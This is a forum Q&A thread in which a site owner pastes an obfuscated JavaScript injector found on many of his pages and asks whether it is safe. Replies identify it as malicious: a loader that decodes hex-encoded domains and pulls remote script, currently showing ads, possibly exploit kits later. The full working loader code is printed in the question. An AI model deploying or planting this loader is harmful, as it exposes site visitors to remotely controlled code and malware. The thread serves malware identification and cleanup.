Answer the question
In order to leave comments, you need to log in
D
D
Denis Vasiliev2016-02-25 22:14:32
Denis Vasiliev, 2016-02-25 22:14:32
Is the script safe?
Tell me, I found about a hundred suspicious scripts on my site. What do they do, are they safe? Self-writing engine, so it's hard to decide. js itself:
<script type="mce-text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21677",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "stroimdvor.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]></script> 3 answer(s)
@good_job
@deniamnet
M
Mark Doe, 2016-02-26 @good_job
Definitely unsafe, you have a hole in your system, it's a so-called iframe cloak injector
Loads auto-generated domains like uuidksinc.net , which contains a "payload" - in your case, the script shows ads like this
In your case, it would be great to use WAF or web antivirus like Yandex.Manul and check - such a frame at some time may start to unscrew a plot pack instead of advertising (a set of scripts that exploit vulnerabilities that can lead to infection of your users with malware), and as a result, your site will fall under Sanctions SafeBrowsing etc.
In general - seriously consider auditing your engine, because this situation can happen again with more catastrophic consequences.
P
Paul Denisevich, 2016-02-25 @deniamnet
1) it's not entirely clear what PHP has to do with it.
2) it looks like some kind of virus and / or XSS, I advise you to remove it and see what happens (most likely, nothing will happen to the site itself), normal scripts (when nothing needs to be hidden) do not write like that.
Similar questions
D
D
R
D
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question